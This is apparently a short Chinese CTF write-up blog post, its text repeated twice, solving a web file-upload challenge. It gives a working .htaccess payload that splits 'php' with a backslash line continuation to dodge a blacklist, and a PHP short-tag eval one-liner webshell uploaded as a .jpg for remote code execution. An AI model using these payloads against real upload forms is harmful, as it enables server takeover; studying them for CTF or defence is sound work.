web就会这一道的我实在是tcl,看来还得多多练习

尝试上传一般文件,过滤了ph和>
黑名单过滤
尝试上传.htaccess文件
Addtype application/x-httpd-p\
hp .jpg
用 \ 换行拼接绕过黑名单上传
上传.jpg文件,写入一句话,这里采用php短标签绕过
<?=eval($_POST[0]);
在php5.4.0以后,<?=总是可用
<?=等价于,<?php echo
上传后即可RCE
"君にどうか幸あれ"
kodosan·2020-05-07·81 次阅读
web就会这一道的我实在是tcl,看来还得多多练习
尝试上传一般文件,过滤了ph和>
黑名单过滤
尝试上传.htaccess文件
Addtype application/x-httpd-p\
hp .jpg
用 \ 换行拼接绕过黑名单上传
上传.jpg文件,写入一句话,这里采用php短标签绕过
<?=eval($_POST[0]);
在php5.4.0以后,<?=总是可用
<?=等价于,<?php echo
上传后即可RCE
Comments | NOTHING